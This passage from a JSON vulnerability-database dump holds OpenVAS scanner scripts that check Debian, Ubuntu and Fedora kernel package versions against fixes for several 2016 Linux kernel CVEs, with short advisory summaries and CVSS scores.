rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64-dbg\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp-lpae\", ver:\"3.16.36-1+deb8u1\", 
rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-ixp4xx\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-kirkwood\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2e\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2f\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-3\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-octeon\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-orion5x\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc-smp\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64le\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r4k-ip22\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r5k-ip32\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x-dbg\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-versatile\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-4kc-malta\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-5kc-malta\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-loongson-2f\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-octeon\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r4k-ip22\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-cobalt\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-ip32\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1-bcm91250a\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1a-bcm91480b\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.16.36-1+deb8u1\", 
rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-3.16\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-3.16\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-support-3.16.0-4\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-3.16.0-4-amd64\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:35:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-14T00:00:00", "id": "OPENVAS:1361412562310842916", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842916", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-3097-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-ti-omap4 USN-3097-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842916\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-14 05:54:21 +0200 (Fri, 14 Oct 2016)\");\n script_cve_id(\"CVE-2016-6828\", \"CVE-2016-6136\", \"CVE-2016-6480\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-3097-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-ti-omap4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Marco Grassi discovered a use-after-free\n condition could occur in the TCP retransmit queue handling code in the Linux\n kernel. A local attacker could use this to cause a denial of service (system\n crash) or possibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller\ndriver in the Linux kernel when handling ioctl()s. A local attacker could\nuse this to cause a denial of service (system crash). 
(CVE-2016-6480)\");\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3097-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3097-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-1489-omap4\", ver:\"3.2.0-1489.116\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310842907", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842907", "type": "openvas", "title": "Ubuntu Update for linux USN-3097-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3097-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it 
under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842907\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 05:45:19 +0200 (Wed, 12 Oct 2016)\");\n script_cve_id(\"CVE-2016-6828\", \"CVE-2016-6136\", \"CVE-2016-6480\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3097-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Marco Grassi discovered a use-after-free\n condition could occur in the TCP retransmit queue handling code in the Linux\n kernel. A local attacker could use this to cause a denial of service (system\n crash) or possibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. 
A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller\ndriver in the Linux kernel when handling ioctl()s. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2016-6480)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3097-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3097-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-111-generic\", ver:\"3.2.0-111.153\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-111-generic-pae\", ver:\"3.2.0-111.153\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-111-highbank\", ver:\"3.2.0-111.153\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-111-omap\", ver:\"3.2.0-111.153\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-111-powerpc-smp\", ver:\"3.2.0-111.153\", rls:\"UBUNTU12.04 
LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-111-powerpc64-smp\", ver:\"3.2.0-111.153\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-111-virtual\", ver:\"3.2.0-111.153\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828", "CVE-2016-7039"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310842912", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842912", "type": "openvas", "title": "Ubuntu Update for linux-lts-trusty USN-3098-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-trusty USN-3098-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842912\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 05:45:40 +0200 (Wed, 12 Oct 2016)\");\n script_cve_id(\"CVE-2016-7039\", \"CVE-2016-6828\", \"CVE-2016-6136\", \"CVE-2016-6480\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-trusty USN-3098-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-trusty'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3098-1 fixed vulnerabilities in the Linux\n kernel for Ubuntu 14.04 LTS. This update provides the corresponding updates for\n the Linux Hardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu\n12.04 LTS.\n\nVladimí r Beneš discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP\nretransmit queue handling code in the Linux kernel. 
A local attacker could\nuse this to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller\ndriver in the Linux kernel when handling ioctl()s. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2016-6480)\");\n script_tag(name:\"affected\", value:\"linux-lts-trusty on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3098-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3098-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-generic\", ver:\"3.13.0-98.145~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-generic-lpae\", ver:\"3.13.0-98.145~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:31", "bulletinFamily": "scanner", "cvelist": 
["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828", "CVE-2016-7039"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310842911", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842911", "type": "openvas", "title": "Ubuntu Update for linux USN-3098-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3098-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842911\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 05:45:34 +0200 (Wed, 12 Oct 2016)\");\n script_cve_id(\"CVE-2016-7039\", \"CVE-2016-6828\", \"CVE-2016-6136\", \"CVE-2016-6480\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3098-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Vladimí r Beneš discovered an\n unbounded recursion in the VLAN and TEB Generic Receive Offload (GRO) processing\n implementations in the Linux kernel, A remote attacker could use this to cause\n a stack corruption, leading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP\nretransmit queue handling code in the Linux kernel. A local attacker could\nuse this to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. 
(CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller\ndriver in the Linux kernel when handling ioctl()s. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2016-6480)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3098-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3098-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-generic\", ver:\"3.13.0-98.145\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-generic-lpae\", ver:\"3.13.0-98.145\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-lowlatency\", ver:\"3.13.0-98.145\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-powerpc-e500\", ver:\"3.13.0-98.145\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-powerpc-e500mc\", ver:\"3.13.0-98.145\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 
((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-powerpc-smp\", ver:\"3.13.0-98.145\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-powerpc64-emb\", ver:\"3.13.0-98.145\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-powerpc64-smp\", ver:\"3.13.0-98.145\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-09-07T00:00:00", "id": "OPENVAS:1361412562310809206", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809206", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-f1adaaadc6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-f1adaaadc6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809206\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-07 10:08:40 +0530 (Wed, 07 Sep 2016)\");\n script_cve_id(\"CVE-2016-6480\", \"CVE-2016-6828\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-f1adaaadc6\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-f1adaaadc6\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QDP4VXQTCWIXMLEFFJABIUUXANGLSC3P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n 
